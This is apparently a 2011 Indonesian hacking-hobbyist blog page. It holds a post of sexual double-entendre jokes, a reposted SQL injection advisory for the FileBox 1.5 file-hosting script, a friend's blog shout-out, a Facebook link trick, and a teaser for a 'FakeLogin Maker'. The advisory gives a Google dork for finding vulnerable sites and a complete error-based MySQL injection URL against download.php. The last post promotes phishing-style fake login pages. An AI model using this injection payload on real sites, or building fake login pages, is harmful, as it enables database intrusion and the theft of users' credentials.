10 cerpen bikin horny... wkwkwk

Posted by ÇyRoÑ!çZ666 !?@/;+&% on 05:50 PM, 31-Aug-11

1. Kuputar tubuhnya menghadap belakang. Lalu kutusuk lubang kecil nan sempit itu, tiba-tiba tubuhnya bergetar hebat... ”Lagi mau nge-charge HP, eh, ada sms.”

2. Rena mengambil tisu, lalu mengelap lendir bening pacarnya itu. “Gara–gara kamu, sampe keluar gini,” kata sang pacar. “Maaf say, kamu jadi ketularan flu,” ujar Rena.

3. Benda bulat itu dipegang tante Intan, digerakkan naik-turun dengan penuh semangat, otot-ototnya pun menjadi tegang. “Ugh, capeknya angkat barbel.”

4. Cewek : “Uuh... Mas, kamu kok lama banget sih keluarnya? Aku pegel nih... cape.”
Cowok : “Maaf say, tadi dosennya ngasih tugas dulu. Udah lama di sini?”

5. Para tante mengerubungiku, seraya memaksaku mengocoknya lebih cepat, akhirnya keluar juga benda putih itu. “Arisan kali ini yang dapet tante Marni.”

6. Jariku masuk ke dalam lubang yang sempit itu. Kugesek-gesek lalu tiba-tiba jariku terasa basah oleh lendir yang bening. “Gini nih kalo ngupil pas lagi pilek... huh.”

7. Gadis muda itu berjongkok di depanku tanpa mengenakan celana dalam, ia pun menatapku dan berkata, “ Ayah... pipisnya udah.”

8. Setelah lama tawar menawar, harga disepakati. Mawar pun berkata, “Mau pake kondom ga??” Gue, “Boleh, biar ga lecet kan casingnya?”

9. “Beb, rada cepet dong genjotannya, udah mau nyampe nih...” ujar Rani. “Huff... iya beb, aku udah sekuat tenaga genjotnya nih.” Jawab Tomi sambil ngos-ngosan. “Awas ada anak kecil nyebrang!” pekik Rani panik.

10. Mulut Rani kempot saking nafsu mengenyotnya, dan benar saja, tak lama kemudian cairan kental dan manis itu tumpah dalam mulutnya. “Oh, enaknya permen blaster.”

pasti udah ada yang pengen keluar!!!

[web/apps] FileBox - File Hosting & Sharing Script v 1.5 SQL Injection Vulnerability

Posted by ÇyRoÑ!çZ666 !?@/;+&% on 09:49 AM, 31-Aug-11

# Exploit Title: FileBox - File
Hosting & Sharing Script 1.5
SQL Injection
# Google Dork: inurl:FileBox
# Date: 30/08/2011
# Author: Scripts Apart
# Software Link: http://
www.scriptsapart.com
# Version: 1.5
# Tested on: Windows 7 ,
Ubuntu 11
# CVE :
# Exploit Discovered :
SubhashDasyam
# Website : http://
www.subhashdasyam.com
There is a SQL Vulnerability in
the FileBox Script

http://localhost/download.php?id=%20and(select%201%20from(select%20count(*),concat((select%20(select%200x53514c20417661696c61626c65206279205375626861736844617379616d)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1

The sqli is MYSQL_Error based one

| Source |

Sambut Teman Baru Kita

Posted by ÇyRoÑ!çZ666 !?@/;+&% on 06:42 PM, 30-Aug-11

hallo semua ketemu lagii. . . smile

kali ini bukan mau share trik hack ato crack. . Haha biggrin

kali ini mau ngenalin blog tmen ane yg mash bru. . Mohon bimbinganya karna mash baru dia belum mengenal dumay leWAT hengpong. .

Langsung aja kita sambut dia. . Mampir blog dia yuk. . biggrin

| Sfs-Boy |

Facebook share Link Via opmin

Posted by ÇyRoÑ!çZ666 !?@/;+&% on 04:18 PM, 08-Aug-11

hehe me punya trik nhe seperti judul diatas shob. . Intro: susah nya kalo pake hp sebar blog ato site kita di fb. . Bisa pake link biasa yg ngga menarik. . Nah ane ada trik nhe sobat wat pengguna opmin subject: kalo bagi pengguna ompin 6 ke atas she gampang ya. . Qta tinggal masuk site yg qta mau share lalu klik kiri... [Read More]

FakeLogin Maker

Posted by ÇyRoÑ!çZ666 !?@/;+&% on 01:35 AM, 30-Jul-11

hehe setelah sekian lama vakum. . Post kedua ini ane pengen share kejailan ane. . Haha. . ilmu diempet sendiri aja gaenak ah. . Mendingan d share. . Bner ga. ? Oke langsung aja seperti judul topik diatas. . Fakelogin yg mau fake login masuk sene aja. . | CyRo666 | klik yg paling bwah wat masuk. . Nah disitu ane dah siapin link contoh.... [Read More]